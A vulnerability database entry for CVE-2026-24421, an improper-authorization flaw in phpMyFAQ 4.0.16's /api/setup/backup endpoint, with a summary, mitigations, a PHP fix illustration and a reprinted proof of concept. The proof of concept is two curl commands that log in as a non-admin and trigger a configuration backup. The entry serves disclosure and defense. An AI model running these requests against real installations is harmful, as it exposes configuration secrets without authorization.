phpMyFAQ 4.0.16 - Improper Authorization
phpMyFAQ version 4.0.16 contains an improper authorization vulnerability where authenticated non-admin users can trigger a configuration backup via the /api/setup/backup endpoint. The endpoint verifies authentication but fails to enforce admin or configuration permissions, allowing any logged-in user to generate and retrieve a backup link. This vulnerability can lead to exposure of sensitive configuration data if the backup ZIP is accessible due to server misconfiguration.
AI Analysis
Technical Summary
In phpMyFAQ 4.0.16, the SetupController.php uses userIsAuthenticated() to check if a user is logged in but does not verify if the user has configuration or admin permissions before allowing access to the /api/setup/backup API endpoint. This improper authorization flaw enables any authenticated non-admin user to generate a configuration backup and obtain a link to the backup ZIP file. The vulnerability was confirmed with proof-of-concept code demonstrating login as a non-admin user and triggering the backup generation successfully. The issue is tracked as CVE-2026-24421.
Potential Impact
Low-privileged authenticated users can create sensitive configuration backups. If the generated backup ZIP file is accessible via the web server (due to misconfiguration), this can lead to unauthorized disclosure of secrets and configuration data, potentially facilitating further compromise of the system.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the /api/setup/backup endpoint to only authorized admin users. Additionally, ensure that backup files are not publicly accessible via the web server to prevent unauthorized retrieval.
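As an added illustration of the authorization gap described above and the permission check that closes it (not phpMyFAQ's own SetupController code; the session shape, the userHasPermission() helper and the 'editconfig' right are assumptions):

```php
<?php
// Added illustration, not phpMyFAQ's own SetupController code.
// The session array, the helper names and the 'editconfig' right are assumptions.

/** Constructed stand-in for the server-side session of the calling user. */
$session = ['authenticated' => true, 'rights' => ['viewfaq']]; // a non-admin user

function userIsAuthenticated(array $session): bool
{
    return $session['authenticated'] === true;
}

/** Hypothetical permission check against the rights stored in the session. */
function userHasPermission(array $session, string $right): bool
{
    return in_array($right, $session['rights'], true);
}

/** Stand-in for the backup routine; returns the path of the archive it would write. */
function createConfigurationBackup(): string
{
    return '/PLACEHOLDER/backup-dir/config-backup.zip'; // placeholder path
}

/** Vulnerable shape: only authentication is checked, so any logged-in user
 *  reaches the backup routine and receives the archive path. */
function backupVulnerable(array $session): array
{
    if (!userIsAuthenticated($session)) {
        return ['status' => 401, 'error' => 'Unauthorized'];
    }
    return ['status' => 200, 'backup' => createConfigurationBackup()];
}

/** Hardened shape: authentication plus a configuration/admin right are required;
 *  a caller without the right is rejected before any archive is created. */
function backupHardened(array $session): array
{
    if (!userIsAuthenticated($session)) {
        return ['status' => 401, 'error' => 'Unauthorized'];
    }
    if (!userHasPermission($session, 'editconfig')) {
        return ['status' => 403, 'error' => 'Forbidden'];
    }
    return ['status' => 200, 'backup' => createConfigurationBackup()];
}

// The same non-admin caller against both handlers.
print_r(backupVulnerable($session)); // reaches the backup routine
print_r(backupHardened($session));   // rejected before a backup exists
```

The second mitigation on this page is independent of this check: even with the handler fixed, the directory that receives the ZIP should not be served by the web server.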
Indicators of Compromise
Exploit Source Code

# Exploit Title: phpMyFAQ <= 4.0.16 - Improper Authorization
# Google Dork: N/A
# Date: 2026-01-23
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: https://www.phpmyfaq.de/
# Software Link: https://www.phpmyfaq.de/download/
# Version: <= 4.0.16 (REQUIRED)
# Tested on: Ubuntu 22.04, Apache 2.4.52, PHP 8.2.x, MariaDB 10.6.x
# CVE: CVE-2026-24421

## Summary
Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but does not enforce authorization (missing configuration/admin permission check), and returns a link/path to the generated ZIP.

## Details
SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged-in user to create a sensitive backup and retrieve its path.

## PoC
Precondition: API enabled, any authenticated non-admin user.

1) Log in as a non-admin user:
curl -c /tmp/pmf_api_cookies.txt \
  -H 'Content-Type: application/json' \
  -d '{"username":"tester","password":"Test1234!"}' \
  http://192.168.40.16/phpmyfaq/api/v3.0/login

2) Trigger backup generation:
curl -i -b /tmp/pmf_api_cookies.txt \
  -X POST --data '4.0.16' \
  http://192.168.40.16/phpmyfaq/api/setup/backup

## Expected Result
The API responds successfully and includes a link/path to the generated ZIP backup even though the caller is not an admin / does not have configuration-edit permissions.

## Impact
Low-privileged users can generate sensitive backups. If the ZIP is web-accessible (server misconfiguration), this can lead to exposure of secrets/configuration and facilitate follow-on compromise.

## References
- GitHub Advisory: GHSA-wm8h-26fv-mg7g
Technical Details
- EDB ID: 52523
- Has exploit code: true
- Code language: text
Threat ID: 69f1f0fdcbff5d8610047e44
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:52:52 AM
Last updated: 4/30/2026, 3:48:56 AM